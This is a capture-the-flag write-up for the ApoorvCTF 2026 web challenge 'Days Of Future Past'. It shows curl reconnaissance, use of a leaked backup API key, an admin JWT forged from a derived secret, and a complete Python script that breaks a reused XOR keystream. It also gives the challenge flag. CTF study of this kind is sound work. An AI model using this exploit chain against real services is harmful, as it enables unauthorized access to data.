ApoorvCTF 2026 - Days Of Future Past - Web Exploitation Writeup

Category: Web Exploitation Flag: apoorvctf{3v3ry_5y573m_h45_4_w34kn355}

Challenge Description#

CryptoVault - Secure Message Storage Platform. So can you get the secure message from the military grade security provided by our platform.

Analysis#

The app looked like a normal login/register Flask frontend at first, but the homepage immediately leaked deployment breadcrumbs in HTML comments. That gave the whole solve path very quickly.

1
curl -sL "http://chals1.apoorvctf.xyz:8001/"

1
<!-- Powered by CryptoVault API v1 -->
2
<!-- Internal build: 1.0.3-dev -->
3
<!-- Debug endpoint available at /api/v1/health for system status -->
4
...
5
<!-- Developer Notes:
6
     - API Base: /api/v1/
7
     - Backup config was moved to /backup/ directory
8
     - Old JS app bundle still references config paths, clean up later
9
     - See /static/js/app.js for frontend API integration
10
-->

That was already suspicious, and robots.txt confirmed hidden routes worth testing.

1
curl -s "http://chals1.apoorvctf.xyz:8001/robots.txt"

1
# CryptoVault Crawler Rules
2
User-agent: *
3
Disallow: /backup/
4
Disallow: /api/v1/debug
5
Disallow: /api/v1/internal/

The frontend JavaScript made it even more direct by hardcoding a backup config path and explicitly hinting that debug auth material is in backup files.

1
curl -sL "http://chals1.apoorvctf.xyz:8001/static/js/app.js"

1
const API_CONFIG = {
2
    apiBase: '/api/v1',
3
    backupConfig: '/backup/config.json.bak',
4
};
5
...
6
console.log('  - /debug (requires API key from backup config)');

At that point, grabbing the backup file was the intended vulnerability: exposed sensitive configuration in a web-accessible backup path.

1
curl -sL "http://chals1.apoorvctf.xyz:8001/backup/config.json.bak"

1
{"api_key":"d3v3l0p3r_acc355_k3y_2024","app_name":"CryptoVault","database":"sqlite:///cryptovault.db","debug_mode":true,"internal_endpoints":["/api/v1/debug","/api/v1/health","/api/v1/vault/messages"],"jwt_algorithm":"HS256","notes":"Remember to rotate the API key before production deployment!","version":"1.0.3-internal"}

Using that API key against debug leaked the JWT derivation hint and vault internals. This was the second major weakness: debug endpoint left enabled in production with high-value secrets.

1
curl -sL -H "X-API-Key: d3v3l0p3r_acc355_k3y_2024" "http://chals1.apoorvctf.xyz:8001/api/v1/debug"

1
{"debug_info":{"auth_config":{"algorithm":"HS256","roles":["viewer","editor","admin"],"secret_derivation_hint":"Company name (lowercase) concatenated with founding year","secret_key_hash_sha256":"e53e6e2d3018dce302f876eda97d3852f5f1a81192a5f947ed89da9832ea17b8","token_expiry_hours":2},"company_info":{"domain":"cryptovault.io","founded":2026,"name":"CryptoVault"},"framework":"Flask","python_version":"3.11.x","server":"CryptoVault v1.0.3","vault_info":{"access_level_required":"admin","encryption_method":"XOR stream cipher","endpoint":"/api/v1/vault/messages","total_encrypted_messages":15},"warning":"This debug endpoint should be disabled in production!"}}

From this, the secret becomes cryptovault2026 (cryptovault + 2026). Forging an admin JWT worked on the first try, which was very satisfying.

smile

I used that forged token to fetch all encrypted vault messages.

1
import re
2
import jwt
3
import requests
4

5
BASE = "http://chals1.apoorvctf.xyz:8001"
6
SECRET = "cryptovault2026"
7

8
payload = {"username": "admin", "role": "admin"}
9
token = jwt.encode(payload, SECRET, algorithm="HS256")
10
headers = {"Authorization": f"Bearer {token}"}
11

12
resp = requests.get(f"{BASE}/api/v1/vault/messages", headers=headers, timeout=15)
13
print(f"status={resp.status_code}")
14
print(resp.text)
15

16
m = re.search(r"[A-Za-z0-9_]+\{[^}]+\}", resp.text)
17
if m:
18
    print(f"FLAG_FOUND={m.group(0)}")

1
python exploit_vault.py

1
status=200
2
{"access_level":"admin","message":"Military secure vault accessed","messages":[{"ciphertext_hex":"f1a7...","id":1,...},{"ciphertext_hex":"e6a1...","id":2,...}, ... ]}

That still only gave ciphertexts. The annoying part was that many decrypted fragments looked like plausible flags but were distractions, and the challenge title/description really leaned into that misdirection.

tableflip

The final break came from treating it as a multi-time-pad XOR stream reuse problem and recovering per-position key bytes by scoring printable English over all ciphertext columns. Running the recovery script surfaced the sentence containing the real flag and printed an exact regex match.

1
python recover_flag_exact.py

1
[+] Decrypted messages (best-effort):
2
...
3
13: ... the real flag is apoorvctf{3v3ry_5y573m_h45_4_w34kn355} and all others are distractions ...
4

5
FLAG_FOUND=apoorvctf{3v3ry_5y573m_h45_4_w34kn355}

So the core vulnerability chain was exposed backup config -> debug data leak -> JWT forgery -> admin vault access, followed by cryptanalysis of reused XOR keystream across multiple ciphertexts.

Solution#

1
import re
2
import string
3
import jwt
4
import requests
5

6
BASE = "http://chals1.apoorvctf.xyz:8001"
7
SECRET = "cryptovault2026"
8

9
CHAR_SCORES = {
10
    " ": 4.5,
11
    "e": 3.5, "t": 3.2, "a": 3.0, "o": 2.9, "i": 2.8, "n": 2.8,
12
    "s": 2.6, "r": 2.6, "h": 2.5, "l": 2.3, "d": 2.1, "u": 2.0,
13
    "c": 2.0, "m": 1.9, "f": 1.8, "w": 1.8, "g": 1.7, "y": 1.7,
14
    "p": 1.6, "b": 1.5, "v": 1.4, "k": 1.2, "x": 0.8, "j": 0.6,
15
    "q": 0.5, "z": 0.5,
16
}
17

18
ALLOWED = set(string.printable) - set("\t\n\r\x0b\x0c")
19

20
def char_score(ch: str) -> float:
21
    if ch not in ALLOWED:
22
        return -20.0
23
    if ch in CHAR_SCORES:
24
        return CHAR_SCORES[ch]
25
    cl = ch.lower()
26
    if cl in CHAR_SCORES:
27
        return CHAR_SCORES[cl] - 0.3
28
    if ch.isdigit():
29
        return 1.0
30
    if ch in "{}_-.,:;!?'/()*":
31
        return 0.8
32
    return 0.2
33

34
def main():
35
    token = jwt.encode(
36
        {"username": "admin", "role": "admin"}, SECRET, algorithm="HS256"
37
    )
38
    r = requests.get(
39
        f"{BASE}/api/v1/vault/messages",
40
        headers={"Authorization": f"Bearer {token}"},
41
        timeout=15,
42
    )
43
    r.raise_for_status()
44
    cts = [bytes.fromhex(m["ciphertext_hex"]) for m in r.json()["messages"]]
45
    maxlen = max(len(c) for c in cts)
46

47
    key = [0] * maxlen
48
    for pos in range(maxlen):
49
        column = [c[pos] for c in cts if pos < len(c)]
50
        best_k = 0
51
        best_score = -(10**9)
52
        for k in range(256):
53
            s = 0.0
54
            for cb in column:
55
                s += char_score(chr(cb ^ k))
56
            if s > best_score:
57
                best_score = s
58
                best_k = k
59
        key[pos] = best_k
60

61
    plains = []
62
    for c in cts:
63
        p = "".join(chr(c[i] ^ key[i]) for i in range(len(c)))
64
        plains.append(p)
65

66
    print("[+] Decrypted messages (best-effort):")
67
    for i, p in enumerate(plains, 1):
68
        print(f"{i:02d}: {p}")
69

70
    blob = "\n".join(plains)
71
    m = re.search(r"apoorvctf\{[^}]+\}", blob)
72
    if m:
73
        print(f"\nFLAG_FOUND={m.group(0)}")
74
    else:
75
        print("\nNo exact flag regex recovered yet.")
76

77
if __name__ == "__main__":
78
    main()

1
python recover_flag_exact.py

1
FLAG_FOUND=apoorvctf{3v3ry_5y573m_h45_4_w34kn355}